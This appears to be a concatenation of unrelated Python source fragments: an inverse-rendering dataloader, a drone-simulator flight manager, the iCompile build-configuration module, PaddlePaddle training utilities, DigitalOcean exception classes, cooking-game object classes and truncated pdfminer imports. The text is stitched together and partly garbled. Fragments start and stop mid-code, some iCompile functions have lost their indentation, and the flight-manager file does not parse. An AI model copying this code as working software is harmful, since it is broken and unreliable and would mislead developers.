            # ranges for network consumption.
            albedoPre = self.loadH5(self.albedoPreList[self.perm[ind] ] )
            albedoPre = albedoPre / np.maximum(np.mean(albedoPre ), 1e-10) / 3

            normalPre = self.loadH5(self.normalPreList[self.perm[ind] ] )
            normalPre = normalPre / np.sqrt(np.maximum(np.sum(normalPre * normalPre, axis=0), 1e-5) )[np.newaxis, :]
            normalPre = 0.5 * (normalPre + 1)

            roughPre = self.loadH5(self.roughPreList[self.perm[ind] ] )[0:1, :, :]
            roughPre = 0.5 * (roughPre + 1)

            depthPre = self.loadH5(self.depthPreList[self.perm[ind] ] )
            depthPre = depthPre / np.maximum(np.mean(depthPre), 1e-10) / 3

            diffusePre = self.loadH5(self.diffusePreList[self.perm[ind] ] )
            diffusePre = diffusePre / max(diffusePre.max(), 1e-10)

            specularPre = self.loadH5(self.specularPreList[self.perm[ind] ] )
            specularPre = specularPre / max(specularPre.max(), 1e-10)

        batchDict = {'albedo': albedo,
                     'normal': normal,
                     'rough': rough,
                     'depth': depth,
                     'segArea': segArea,
                     'segEnv': segEnv,
                     'segObj': segObj,
                     'im': im,
                     'name': self.imList[self.perm[ind] ]
                     }

        if self.isLight:
            batchDict['envmaps'] = envmapsInd is not None and envmaps or envmaps
            batchDict['envmaps'] = envmaps
            batchDict['envmapsInd'] = envmapsInd
            if self.cascadeLevel > 0:
                batchDict['envmapsPre'] = envmapsPre

        if self.cascadeLevel > 0:
            batchDict['albedoPre'] = albedoPre
            batchDict['normalPre'] = normalPre
            batchDict['roughPre'] = roughPre
            batchDict['depthPre'] = depthPre
            batchDict['diffusePre'] = diffusePre
            batchDict['specularPre'] = specularPre

        return batchDict

    def loadImage(self, imName, isGama = False):
        """Load an LDR image as float32 CHW in [-1, 1] (optionally
        gamma-decoded first)."""
        if not(osp.isfile(imName ) ):
            print(imName )
            assert(False )

        im = Image.open(imName)
        # NOTE(review): Image.ANTIALIAS was removed in Pillow 10;
        # use Image.LANCZOS when upgrading Pillow.
        im = im.resize([self.imWidth, self.imHeight], Image.ANTIALIAS )

        im = np.asarray(im, dtype=np.float32)
        if isGama:
            im = (im / 255.0) ** 2.2
            im = 2 * im - 1
        else:
            im = (im - 127.5) / 127.5
        if len(im.shape) == 2:
            im = im[:, np.newaxis]
        im = np.transpose(im, [2, 0, 1] )
        return im

    def loadHdr(self, imName):
        """Load an HDR image as float32 CHW, BGR -> RGB."""
        if not(osp.isfile(imName ) ):
            print(imName )
            assert(False )
        im = cv2.imread(imName, -1)
        if im is None:
            print(imName )
            assert(False )
        im = cv2.resize(im, (self.imWidth, self.imHeight), interpolation = cv2.INTER_AREA )
        im = np.transpose(im, [2, 0, 1])
        # cv2 loads BGR; flip the channel axis to RGB.
        im = im[::-1, :, :]
        return im

    def scaleHdr(self, hdr, seg):
        """Scale the HDR image so its (masked) 95th-percentile intensity
        lands near 0.95 (randomized for TRAIN), then clip to [0, 1].

        self.phase is guaranteed to be 'TRAIN' or 'TEST' by __init__.
        """
        intensityArr = (hdr * seg).flatten()
        intensityArr.sort()
        if self.phase.upper() == 'TRAIN':
            scale = (0.95 - 0.1 * np.random.random() ) / np.clip(intensityArr[int(0.95 * self.imWidth * self.imHeight * 3) ], 0.1, None)
        elif self.phase.upper() == 'TEST':
            scale = (0.95 - 0.05) / np.clip(intensityArr[int(0.95 * self.imWidth * self.imHeight * 3) ], 0.1, None)
        hdr = scale * hdr
        return np.clip(hdr, 0, 1), scale

    def loadBinary(self, imName ):
        """Load a raw depth file: int32 height, int32 width, then
        height*width float32 values; returns a (1, H, W) array."""
        if not(osp.isfile(imName ) ):
            print(imName )
            assert(False )
        with open(imName, 'rb') as fIn:
            hBuffer = fIn.read(4)
            height = struct.unpack('i', hBuffer)[0]
            wBuffer = fIn.read(4)
            width = struct.unpack('i', wBuffer)[0]
            dBuffer = fIn.read(4 * width * height )
            depth = np.asarray(struct.unpack('f' * height * width, dBuffer), dtype=np.float32 )
            depth = depth.reshape([height, width] )
            depth = cv2.resize(depth, (self.imWidth, self.imHeight), interpolation=cv2.INTER_AREA )
        return depth[np.newaxis, :, :]

    def loadH5(self, imName ):
        """Read the 'data' array from an .h5 file; None on any failure
        (caller substitutes a zero prediction)."""
        try:
            hf = h5py.File(imName, 'r')
            im = np.array(hf.get('data' ) )
            return im
        except:
            return None

    def loadEnvmap(self, envName ):
        """Load per-pixel environment maps.

        Returns (env, envInd): env has shape
        (3, envRow, envCol, envHeight, envWidth) and envInd is a
        validity flag (1 = loaded, 0 = missing/unreadable, env zeroed).
        """
        if not osp.isfile(envName ):
            env = np.zeros( [3, self.envRow, self.envCol,
                self.envHeight, self.envWidth], dtype = np.float32 )
            envInd = np.zeros([1, 1, 1], dtype=np.float32 )
            print('Warning: the envmap %s does not exist.' % envName )
            return env, envInd
        else:
            envHeightOrig, envWidthOrig = 16, 32
            assert( (envHeightOrig / self.envHeight) == (envWidthOrig / self.envWidth) )
            assert( envHeightOrig % self.envHeight == 0)

            env = cv2.imread(envName, -1 )
            if not env is None:
                env = env.reshape(self.envRow, envHeightOrig, self.envCol,
                        envWidthOrig, 3)
                env = np.ascontiguousarray(env.transpose([4, 0, 2, 1, 3] ) )

                scale = envHeightOrig / self.envHeight
                if scale > 1:
                    # Downsample by 2x2 mean pooling (assumes scale == 2).
                    env = block_reduce(env, block_size = (1, 1, 1, 2, 2), func = np.mean )

                envInd = np.ones([1, 1, 1], dtype=np.float32 )
                return env, envInd
            else:
                env = np.zeros( [3, self.envRow, self.envCol,
                    self.envHeight, self.envWidth], dtype = np.float32 )
                envInd = np.zeros([1, 1, 1], dtype=np.float32 )
                print('Warning: the envmap %s does not exist.' % envName )
                return env, envInd
        # (The original had an unreachable trailing 'return env, envInd'
        # here; it has been removed.)
|
"""
"""
#all this importation stuff?
import SimReceiver
import SimBoard
import SimMotor
import SimSensors
class FHackflightFlightManager(FFlightManager):
    """Flight manager wiring a simulated Hackflight stack (receiver,
    board, motors, sensors) into the framework's FFlightManager.

    NOTE(review): this file is an unfinished sketch and does not parse:
    a comma is missing after ``dynamics`` in the __init__ signature,
    several lists/calls are left as ``[#???]`` placeholders, and
    ``tick(self, None)`` is not a legal signature. The notes below mark
    each broken spot; the code itself is left untouched.
    """
    # NOTE(review): missing ',' after 'dynamics'; '\' + newline followed
    # by 'pidEnabled' is a syntax error.
    def __init__(self, pawn, mixer, motors, dynamics\
        pidEnabled = True ):
        #???
        # NOTE(review): the base-class constructor result is discarded;
        # presumably FFlightManager.__init__(self, dynamics) (or
        # super().__init__(dynamics)) was intended — confirm.
        FFlightManager(dynamics)
        self._motors = motors
        #Unreal engine function?
        # NOTE(review): '#something' comments out the rest of this call,
        # leaving the parenthesis unclosed.
        self._receiver = SimReceiver(#something, 0)
        # NOTE(review): _board, _receiver, _dynamics, _sensors, levelPid,
        # ratePid, yawPid and Hackflight are referenced bare (no self.)
        # and are never defined or imported in this file.
        self._hackflight = Hackflight(_board, _receiver, mixer)
        self._sensors = SimSensors(_dynamics)
        self._hackflight.addSensor(_sensors)
        if pidEnabled:
            self._hackflight.addClosedLoopController(levelPid)
            self._hackflight.addClosedLoopController(ratePid)
            self._hackflight.addClosedLoopController(yawPid)
        self._hackflight.begin(True)
    #override?
    def getMotors(self, time, motorvals):
        joystickError = self._receiver.update()
        # NOTE(review): the three '[#???]' placeholders leave brackets
        # unclosed; the state vectors still need to be filled in.
        angularVel = [#???]
        eulerAngles = [#???]
        quaternion = [#???]
        #WHat's this for?
        #if joystickError:
        self._hackflight.update()
        self._board.set(time)
        for i in range (self._nmotors):
            motorvals[i] = self._motors.getValue(i)
    # NOTE(review): 'None' is not a valid parameter name; the parameter
    # is presumably unused and should be dropped.
    def tick(self, None):
        self._receiver.tick()
|
# doticompile.py
#
# Manage .icompile files
import ConfigParser, string, os, copyifnewer, templateG3D, templateHello
from utils import *
from doxygen import *
from variables import *
from help import *
# If True, the project will not be rebuilt if all dependencies
# other than iCompile are up to date. This is handy when
# working on iCompile and testing with large libraries.
# If True, skip rebuilds whose only stale dependency is iCompile itself.
_IGNORE_ICOMPILE_DEPENDENCY = False

##############################################################################
#                              Default .icompile                             #
##############################################################################

# Shared help banner embedded verbatim into both generated config files
# below.  It is runtime data (written to the user's disk), so its text
# must not be edited casually.
configHelp = """
# If you have special needs, you can edit per-project ice.txt
# files and your global ~/.icompile file to customize the
# way your projects build. However, the default values are
# probably sufficient and you don't *have* to edit these.
#
# To return to default settings, just delete ice.txt and
# ~/.icompile and iCompile will generate new ones when run.
#
#
# In general you can set values without any quotes, e.g.:
#
# compileoptions = -O3 -g --verbose $(CXXFLAGS) %(defaultcompileoptions)s
#
# Adds the '-O3' '-g' and '--verbose' options to the defaults as
# well as the value of environment variable CXXFLAGS.
#
# These files have the following sections and variables.
# Values in ice.txt override those specified in .icompile.
#
# GLOBAL Section
# compiler Path to compiler.
# include Semi-colon or colon (on Linux) separated
# include paths.
#
# library Same, for library paths.
#
# defaultinclude The initial include path.
#
# defaultlibrary The initial library path.
#
# defaultcompiler The initial compiler.
#
# defaultexclude Regular expression for directories to exclude
# when searching for C++ files. Environment
# variables are NOT expanded for this expression.
# e.g. exclude: <EXCLUDE>|^win32$
#
# builddir Build directory, relative to ice.txt. Start with a
# leading slash (/) to make absolute.
#
# tempdir Temp directory, relative to ice.txt. Start with a
# leading slash (/) to make absolute.
#
# beep If True, beep after compilation
#
# DEBUG and RELEASE Sections
#
# compileoptions
# linkoptions Options *in addition* to the ones iCompile
# generates for the compiler and linker, separated
# by spaces as if they were on a command line.
#
#
# The following special values are available:
#
# $(envvar) Value of shell variable named envvar.
# Unset variables are the empty string.
# $(shell ...) Runs the '...' and replaces the expression
# as if it were the value of an envvar.
# %(localvar)s Value of a variable set inside ice.txt
# or .icompile (Yes, you need that 's'--
# it is a Python thing.)
# <NEWESTCOMPILER> The newest version of gcc or Visual Studio on your system.
# <EXCLUDE> Default directories excluded from compilation.
#
# The special values may differ between the RELEASE and DEBUG
# targets. The default .icompile sets the 'default' variables
# and the default ice.txt sets the real ones from those, so you
# can chain settings.
#
# Colors have the form:
#
# [bold|underline|reverse|italic|blink|fastblink|hidden|strikethrough]
# [FG] [on BG]
#
# where FG and BG are each one of
# {default, black, red, green, brown, blue, purple, cyan, white}
# Many styles (e.g. blink, italic) are not supported on most terminals.
#
# Examples of legal colors: "bold", "bold red", "bold red on white", "green",
# "bold on black"
#
"""

# Contents written to ~/.icompile when the user has none yet.
defaultDotICompile = """
# This is a configuration file for iCompile (http://ice.sf.net)
# """ + configHelp + """
[GLOBAL]
defaultinclude: $(INCLUDE);/usr/local/include/SDL11;/usr/include/SDL;/usr/X11R6/include;
defaultlibrary: $(LIBRARY);$(LD_LIBRARY_PATH);/usr/X11R6/lib;
defaultcompiler: <NEWESTCOMPILER>
defaultexclude: <EXCLUDE>
beep: True
tempdir: .ice-tmp
builddir: build
[DEBUG]
[RELEASE]
"""

# Contents written to a project's ice.txt when one does not exist.
defaultProjectFileContents = """
# This project can be compiled by typing 'icompile'
# at the command line. Download the iCompile Python
# script from http://ice.sf.net
#
################################################################
""" + configHelp + """
################################################################
[GLOBAL]
compiler: %(defaultcompiler)s
include: %(defaultinclude)s
library: %(defaultlibrary)s
exclude: %(defaultexclude)s
# Colon-separated list of libraries on which this project depends. If
# a library is specified (e.g., png.lib) the platform-appropriate
# variation of that name is added to the libraries to link against.
# If a directory containing an iCompile ice.txt file is specified,
# that project will be built first and then added to the include
# and library paths and linked against.
uses:
################################################################
[DEBUG]
compileoptions:
linkoptions:
################################################################
[RELEASE]
compileoptions:
linkoptions:
"""
#################################################################
# Configuration & Project File #
#################################################################
""" Reads [section]name from the provided configuration, replaces
<> and $() values with the appropriate settings.
If exp is False $() variables are *not* expanded.
If
"""
def configGet(state, config, section, name, exp = True):
    """Read [section]name from config, substituting the <...> special
    tokens; $() environment expansion runs only when exp is True.
    Returns '' (with a warning) on interpolation errors from stale
    ice.txt files."""
    try:
        value = config.get(section, name)
    except ConfigParser.InterpolationMissingOptionError:
        maybeWarn('Variable \'' + name + '\' in ' + ' the [' + section + '] section of ' +
           state.rootDir + 'ice.txt may have an illegal value. If that ice.txt ' +
           'file is from a previous version of iCompile you should delete it.\n', state)
        return ''

    # Substitute the <...> special tokens, if any appear in the value.
    if '<' in value:
        if '<NEWESTGCC>' in value:
            (gppname, ver) = newestCompiler()
            value = value.replace('<NEWESTGCC>', gppname)
        if '<NEWESTCOMPILER>' in value:
            (compname, ver) = newestCompiler()
            value = value.replace('<NEWESTCOMPILER>', compname)
        value = value.replace('<EXCLUDE>', string.join(copyifnewer._cppExcludePatterns + ['^CMakeFiles$'], '|'))

    value = os.path.expanduser(value)
    if exp:
        value = expandvars(value)
    return value
class FakeFile:
    """Wraps a string so it can be handed to ConfigParser.readfp(),
    which only needs an object exposing readline()."""
    # Class-level defaults; both are rebound per-instance in __init__.
    _textLines = []
    _currentLine = 0

    def __init__(self, contents):
        self._currentLine = 0
        self._textLines = contents.split('\n')

    def readline(self):
        """Return the next line (newline-terminated), or '' at EOF."""
        if self._currentLine >= len(self._textLines):
            # end of file
            return ''
        line = self._textLines[self._currentLine]
        self._currentLine += 1
        return line + '\n'
""" Called from processProjectFile """
def _processDotICompile(state, config):
# Set the defaults from the default .icompile and ice.txt
config.readfp(FakeFile(defaultDotICompile))
config.readfp(FakeFile(defaultProjectFileContents))
# Process .icompile
if os.path.exists(state.preferenceFile()):
if verbosity >= TRACE: print 'Processing ' + state.preferenceFile()
config.read(state.preferenceFile())
else:
success = False
HOME = os.environ['HOME']
preferenceFile = HOME + '/.icompile'
# Try to generate a default .icompile
if os.path.exists(HOME):
f = file(preferenceFile, 'wt')
if f != None:
f.write(defaultDotICompile)
f.close()
success = True
if verbosity >= TRACE:
colorPrint('Created a default preference file for ' +
'you in ' + preferenceFile + '\n',
SECTION_COLOR)
# We don't need to read this new .icompile because
# it matches the default, which we already read.
if not success and verbosity >= TRACE:
print ('No ' + preferenceFile + ' found and cannot write to '+ HOME)
""" Process the project file and .icompile so that we can use configGet.
Sets a handful of variables."""
def processProjectFile(state, ignoreIceTxt = False):
config = ConfigParser.SafeConfigParser()
_processDotICompile(state, config)
if not ignoreIceTxt:
# Process the project file
projectFile = 'ice.txt'
if verbosity >= TRACE: print 'Processing ' + projectFile
config.read(projectFile)
# Don't expand '$' envvar in regular expressions since
# $ means end of pattern.
exclude = configGet(state, config, 'GLOBAL', 'exclude', False)
state.excludeFromCompilation = re.compile(exclude)
# Parses the "uses" line, if it exists
L = ''
try:
L = configGet(state, config, 'GLOBAL', 'uses')
except ConfigParser.NoOptionError:
# Old files have no 'uses' section
pass
for u in string.split(L, ':'):
if u.strip() != '':
if os.path.exists(pathConcat(u, 'ice.txt')):
# This is another iCompile project
state.addUsesProject(u, False)
else:
state.addUsesLibrary(u, False)
state.buildDir = addTrailingSlash(configGet(state, config, 'GLOBAL', 'builddir', True))
state.tempParentDir = addTrailingSlash(configGet(state, config, 'GLOBAL', 'tempdir', True))
state.tempDir = addTrailingSlash(pathConcat(state.tempParentDir, state.projectName))
state.beep = configGet(state, config, 'GLOBAL', 'beep')
state.beep = (state.beep == True) or (state.beep.lower() == 'true')
# Include Paths
state.addIncludePath(makePathList(configGet(state, config, 'GLOBAL', 'include')))
# Add our own include directories.
if isLibrary(state.binaryType):
extraInclude = [path for path in ['include', 'include/' + state.projectName]
if os.path.exists(path)]
state.addIncludePath(extraInclude)
# Library Paths
state.addLibraryPath(makePathList(configGet(state, config, 'GLOBAL', 'library')))
state.compiler = configGet(state, config, 'GLOBAL', 'compiler')
state.compilerOptions = string.split(configGet(state, config, state.target, 'compileoptions'), ' ')
state.linkerOptions = string.split(configGet(state, config, state.target, 'linkoptions'), ' ')
#########################################################################
# Loads configuration from the current directory, where args
# are the arguments preceding --run that were passed to iCompile
#
# Returns the configuration state
def getConfigurationState(args):
    """Build and return the iCompile configuration State for this run.

    args: command-line arguments preceding --run that were passed to iCompile.
    Exits the process on invalid flag combinations or bad template names.
    """
    state = State()
    state.args = args
    state.universalBinary = (machine() == 'i386')
    # --template takes its value from the following argument, if any.
    state.template = ''
    if '--template' in args:
        for i in xrange(0, len(args)):
            if args[i] == '--template':
                if i < len(args) - 1:
                    state.template = args[i + 1]
    state.noPrompt = '--noprompt' in args
    # --template only makes sense in non-interactive (--noprompt) mode.
    if state.template != '' and not state.noPrompt:
        colorPrint("ERROR: cannot specify --template without --noprompt", ERROR_COLOR)
        sys.exit(-208)
    if state.template != 'hello' and state.template != 'G3D' and state.template != 'empty' and state.template != '':
        colorPrint("ERROR: 'hello', 'G3D', and 'empty' are the only legal template names (template='" +
                   state.template + "')", ERROR_COLOR)
        sys.exit(-209)
    # Root directory
    state.rootDir = os.getcwd() + "/"
    # Project name: derived from the current directory name; an extension on
    # the directory name selects the binary type below.
    state.projectName = string.split(state.rootDir, ('/'))[-2]
    ext = string.lower(extname(state.projectName))
    state.projectName = rawfilename(state.projectName)
    # Binary type
    if (ext == 'lib') or (ext == 'a'):
        state.binaryType = LIB
    elif (ext == 'dll') or (ext == 'so'):
        state.binaryType = DLL
    elif (ext == 'exe') or (ext == ''):
        state.binaryType = EXE
    else:
        # Unknown extensions fall back to an executable, with a warning.
        state.binaryType = EXE
        maybeWarn("This project has unknown extension '" + ext +
                  "' and will be compiled as an executable.", state)
    # Choose target: release when --opt/-O (or --deploy without --debug).
    if ('--opt' in args) or ('-O' in args) or (('--deploy' in args) and not ('--debug' in args)):
        if ('--debug' in args):
            colorPrint("Cannot specify '--debug' and '--opt' at " +
                       "the same time.", WARNING_COLOR)
            sys.exit(-1)
        state.target = RELEASE
        d = ''
    else:
        state.target = DEBUG
        d = 'd'  # debug builds get a 'd' suffix on the binary name
    # Find an icompile project file. If there isn't one, give the
    # user the opportunity to create one or abort.
    checkForProjectFile(state, args)
    # Load settings from the project file.
    processProjectFile(state)
    discoverPlatform(state)
    unix = not state.os.startswith('win')
    # On unix-like systems we prefix library names with 'lib'
    prefix = ''
    if unix and isLibrary(state.binaryType):
        prefix = 'lib'
    state.installDir = state.buildDir + state.platform + '/'
    # Binary name and output directory depend on the binary type.
    if (state.binaryType == EXE):
        state.binaryDir = state.installDir
        state.binaryName = state.projectName + d
    elif (state.binaryType == DLL):
        state.binaryDir = state.installDir + 'lib/'
        state.binaryName = prefix + state.projectName + d + '.so'
    elif (state.binaryType == LIB):
        state.binaryDir = state.installDir + 'lib/'
        state.binaryName = prefix + state.projectName + d + '.a'
    # Make separate directories for object files based on
    # debug/release
    state.objDir = state.tempDir + state.platform + '/' + state.target + '/'
    # Find out when icompile was itself modified
    state.icompileTime = getTimeStamp(sys.argv[0])
    if _IGNORE_ICOMPILE_DEPENDENCY:
        # Set the iCompile timestamp to the beginning of time, so that
        # it looks like icompile itself was never modified.
        state.icompileTime = 0
    # Rebuild if ice.txt or .icompile was modified
    # more recently than the source.
    if os.path.exists('ice.txt'):
        iceTime = getTimeStamp('ice.txt')
        if iceTime > state.icompileTime:
            state.icompileTime = iceTime
    if os.path.exists(state.preferenceFile()):
        configTime = getTimeStamp(state.preferenceFile())
        if configTime > state.icompileTime:
            state.icompileTime = configTime
    return state
##################################################################################
""" Checks for ice.txt and, if not found, prompts the user to create it
and returns if they press Y, otherwise exits."""
def checkForProjectFile(state, args):
    """Ensure an ice.txt project file exists, prompting or generating one.

    Returns immediately when ice.txt is present.  Otherwise, interactively
    confirms with the user (unless state.noPrompt) and optionally generates
    starter files from a template, then writes a default ice.txt.
    """
    # Assume default project file
    projectFile = 'ice.txt'
    if os.path.exists(projectFile): return
    # Everything below here executes only when there is no project file
    if not state.noPrompt:
        if '--clean' in args:
            print
            colorPrint('Nothing to clean (you have never run iCompile in ' +
                       os.getcwd() + ')', WARNING_COLOR)
            print
            # There's nothing to delete anyway, so just exit
            sys.exit(0)
        print
        # Warn loudly when running from the user's home directory.
        inHomeDir = (os.path.realpath(os.getenv('HOME')) == os.getcwd())
        if inHomeDir:
            colorPrint(' ******************************************************',
                       WARNING_COLOR)
            colorPrint(' * You are about run iCompile in your home directory! *',
                       'bold red')
            colorPrint(' ******************************************************',
                       WARNING_COLOR)
        else:
            colorPrint('You have never run iCompile in this directory before.',
                       WARNING_COLOR)
        print
        print ' Current Directory: ' + os.getcwd()
        # Don't show dot-files first if we can avoid it
        dirs = listDirs()
        dirs.reverse()
        num = len(dirs)
        sl = shortlist(dirs)
        if (num > 1):
            print ' Contains', num, 'directories (' + sl + ')'
        elif (num > 0):
            print ' Contains 1 directory (' + dirs[0] + ')'
        else:
            print ' Contains no subdirectories'
        # Summarize the C++ files found below this directory.
        cfiles = listCFiles()
        num = len(cfiles)
        sl = shortlist(cfiles)
        if (num > 1):
            print ' Subdirectories contain', num, 'C++ files (' + sl + ')'
        elif (num > 0):
            print ' Subdirectories contain 1 C++ file (' + cfiles[0] + ')'
        else:
            print ' Subdirectories contain no C++ files'
        print
        dir = string.split(os.getcwd(), '/')[-1]
        if inHomeDir:
            prompt = ('Are you sure you want to run iCompile '+
                      'in your home directory? (Y/N)')
        else:
            prompt = ("Are you sure you want to compile the '" +
                      dir + "' project? (Y/N)")
        colorPrint(prompt, 'bold')
        if string.lower(getch()) != 'y':
            sys.exit(0)
        # num is the C++ file count here; offer starter files only when the
        # directory tree has no C++ sources yet.
        if (num == 0):
            prompt = ("Would you like to generate a set of starter files for the '" +
                      dir + "' project? (Y/N)")
            colorPrint(prompt, 'bold')
            if string.lower(getch()) == 'y':
                prompt = "Select a project template:\n [H]ello World\n [G]3D\n"
                colorPrint(prompt, 'bold')
                if string.lower(getch()) == 'h':
                    templateHello.generateStarterFiles(state)
                else:
                    templateG3D.generateStarterFiles(state)
    # Non-interactive path: honor --template directly.
    if state.noPrompt and state.template != '':
        if state.template == 'hello':
            templateHello.generateStarterFiles(state)
        elif state.template == 'G3D':
            templateG3D.generateStarterFiles(state)
        elif state.template == 'empty':
            # Intentionally do nothing
            ''
        else:
            print 'ERROR: illegal template'
    writeFile(projectFile, defaultProjectFileContents);
|
# Copyright (c) 2022 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Utils."""
import os
from os.path import basename
import numpy as np
import paddle
def get_model_parameter_size(model):
    """Return the total number of scalar elements across all model parameters.

    Args:
        model: any object exposing ``parameters()`` yielding objects with a
            ``.shape`` sequence (e.g. a paddle Layer).
    """
    size = 0
    for param in model.parameters():
        # np.prod replaces np.product, which was deprecated and removed in
        # NumPy 2.0; int() avoids leaking a numpy scalar to callers.
        size += int(np.prod(param.shape))
    return size
def tree_map(f, d):
    """Apply ``f`` to every leaf of nested dict ``d``; returns a new dict."""
    return {
        key: tree_map(f, value) if type(value) is dict else f(value)
        for key, value in d.items()
    }
def tree_flatten(d):
    """Flatten nested dict ``d`` to one level, joining keys with dots."""
    flat = {}
    for key, value in d.items():
        if type(value) is dict:
            for sub_key, sub_value in tree_flatten(value).items():
                flat[f'{key}.{sub_key}'] = sub_value
        else:
            flat[key] = value
    return flat
def tree_filter(key_cond, value_cond, d):
    """Recursively filter nested dict ``d`` by key and value predicates.

    Args:
        key_cond: predicate on keys, or None to accept every key.
        value_cond: predicate on values (including sub-dicts), or None.

    Returns a new dict; sub-dicts that filter down to empty are dropped.
    """
    new_d = {}
    for k in d:
        # `x is not None` replaces the original `not x is None` idiom.
        if key_cond is not None and not key_cond(k):
            continue
        if value_cond is not None and not value_cond(d[k]):
            continue
        if type(d[k]) is dict:
            cur_d = tree_filter(key_cond, value_cond, d[k])
            if len(cur_d) != 0:
                new_d[k] = cur_d
        else:
            new_d[k] = d[k]
    return new_d
def add_to_data_writer(data_writer, step, results, prefix=''):
    """Print ``results`` and, when a writer is given, log each metric.

    Each key in ``results`` is recorded as the scalar "<prefix>/<key>".
    """
    print("step:%d %s:%s" % (step, prefix, str(results)))
    if data_writer is not None:
        for name, value in results.items():
            data_writer.add_scalar("%s/%s" % (prefix, name), value, step)
def upload_to_hadoop(args, cur_step):
    """Upload the step's checkpoint and all tensorboard logs to HDFS.

    Requires the HADOOP_FS (hadoop fs command prefix) and OUTPUT_PATH
    environment variables to be set.
    """
    def _upload_file(local_file, hadoop_dir):
        # Guard against rm-ing a suspiciously short destination path.
        assert len(hadoop_dir) > 10, \
            f"hadoop_dir ({hadoop_dir}) is too short"
        file_name = basename(local_file)
        # Best-effort shell calls; return codes are ignored (mkdir may
        # legitimately fail when the directory already exists).
        os.system(f"{hadoop_fs} -mkdir {hadoop_dir}")
        os.system(f"{hadoop_fs} -rmr {hadoop_dir}/{file_name}")
        os.system(f"{hadoop_fs} -put {local_file} {hadoop_dir}/{file_name}")
    hadoop_fs = os.environ["HADOOP_FS"]
    output_path = os.environ["OUTPUT_PATH"]
    # upload models
    _upload_file(
        f'{args.model_dir}/step_{cur_step}.pdparams',
        f'{output_path}/models')
    # upload tensorboard log
    files = os.listdir(f'{args.log_dir}/tensorboard_log_dir')
    for file in files:
        _upload_file(
            f'{args.log_dir}/tensorboard_log_dir/{file}',
            f'{output_path}/log/tensorboard_log_dir')
def csv_print(d):
    """Print dict ``d`` as two space-separated rows: sorted keys, then values."""
    ordered = sorted(d)
    print(' '.join(str(k) for k in ordered))
    print(' '.join(str(d[k]) for k in ordered))
from dopy.manager import DoError
class DoMissingVariableError(DoError):
    """Raised when a required DigitalOcean variable is not provided."""

    def __init__(self, message=None):
        if message is None:
            message = "Missing Required Variable"
        self.message = message
        super(DoMissingVariableError, self).__init__(self.message)
class DoEnvironmentError(DoError):
    """Raised when DigitalOcean credential environment variables are unset."""
    def __init__(self, message=None):
        self.message = message
        if message is None:
            self.message = "Could not find values for DigitalOcean environment. \
Required for v2: DO_API_TOKEN. Required for v1: DO_CLIENT_ID, DO_API_KEY"
        super(DoEnvironmentError, self).__init__(self.message)
|
from abc import abstractmethod, ABC
from gym_cooking.cooking_world.constants import *
class Object(ABC):
    """Base class for everything placed in the cooking world."""

    def __init__(self, location, movable, walkable):
        self.location = location
        self.movable = movable    # can be picked up
        self.walkable = walkable  # agents may stand on it

    def name(self) -> str:
        """Return the concrete subclass's name."""
        return type(self).__name__

    def move_to(self, new_location):
        """Relocate this object to ``new_location``."""
        self.location = new_location

    @abstractmethod
    def file_name(self) -> str:
        """Return the file name used to represent this object."""
class ActionObject(ABC):
    """Interface for objects that react when acted upon."""

    @abstractmethod
    def action(self, objects):
        """Apply this object's action to ``objects``."""
class ProgressingObject(ABC):
    """Interface for objects that advance some process each time step."""

    @abstractmethod
    def progress(self, dynamic_objects):
        """Advance this object's process given the nearby dynamic objects."""
class StaticObject(Object):
    """Immovable world object; its location is fixed for its lifetime."""

    def __init__(self, location, walkable):
        super().__init__(location, False, walkable)

    def move_to(self, new_location):
        # Moving a static object is a programming error.
        raise Exception(f"Can't move static object {self.name()}")

    @abstractmethod
    def accepts(self, dynamic_objects) -> bool:
        """Return True when the given dynamic objects may be placed here."""
class DynamicObject(Object, ABC):
    """Movable, non-walkable object (something an agent can carry)."""

    def __init__(self, location):
        super().__init__(location, True, False)
class Container(DynamicObject, ABC):
    """Dynamic object that carries other dynamic objects as content."""

    def __init__(self, location, content=None):
        super().__init__(location)
        # Falsy content (None or empty) yields a fresh list.
        self.content = content or []

    def move_to(self, new_location):
        """Move the container; its contents travel with it."""
        for item in self.content:
            item.move_to(new_location)
        self.location = new_location

    def add_content(self, content):
        """Place ``content`` inside this container."""
        self.content.append(content)
class Food:
    """Marker interface for food items; subclasses report completion via done().

    NOTE(review): Food does not inherit ABC, so @abstractmethod is not
    enforced through this class alone; enforcement only happens in
    subclasses (ChopFood, BlenderFood) that also list ABC as a base.
    """
    @abstractmethod
    def done(self):
        # True once processing has finished (chop/blend use this to stop).
        pass
class ChopFood(DynamicObject, Food, ABC):
    """Food item that is processed by chopping."""

    def __init__(self, location):
        super().__init__(location)
        self.chop_state = ChopFoodStates.FRESH

    def chop(self):
        """Chop this food once; returns False when it is already done."""
        if self.done():
            return False
        self.chop_state = ChopFoodStates.CHOPPED
        return True
class BlenderFood(DynamicObject, Food, ABC):
    """Food item that is processed in a blender over multiple steps."""

    def __init__(self, location):
        super().__init__(location)
        # NOTE(review): progress counts DOWN from min_progress (10) toward
        # max_progress (0) — the min/max naming is inverted relative to the
        # counting direction; confirm before changing.
        self.current_progress = 10
        self.max_progress = 0
        self.min_progress = 10
        self.blend_state = BlenderFoodStates.FRESH

    def blend(self):
        """Advance blending by one step; returns False once already done."""
        if self.done():
            return False
        if self.blend_state == BlenderFoodStates.FRESH or self.blend_state == BlenderFoodStates.IN_PROGRESS:
            self.current_progress -= 1
            # Becomes MASHED when the countdown reaches max_progress (0).
            self.blend_state = BlenderFoodStates.IN_PROGRESS if self.current_progress > self.max_progress \
                else BlenderFoodStates.MASHED
        return True
# All abstract base classes that make up the game-object taxonomy.
ABSTRACT_GAME_CLASSES = (ActionObject, ProgressingObject, Container, Food, ChopFood, DynamicObject, StaticObject,
                         BlenderFood)
# Classes whose instances carry mutable processing state (chop/blend).
STATEFUL_GAME_CLASSES = (ChopFood, BlenderFood)
|
""" Config flow for APC Home """
|
from pdfminer.psparser import LIT, PSLiteral, PSStackParser, PSKeyword, PSEOF, keyword_name
from pdfminer.pdftypes import PDFObjRef, resolve1, dict_value, stream_value, list_value, PDFStream
from PIL import ImageCms
from io import BytesIO
import numpy as np
from itertools import product
class colorSpaces:
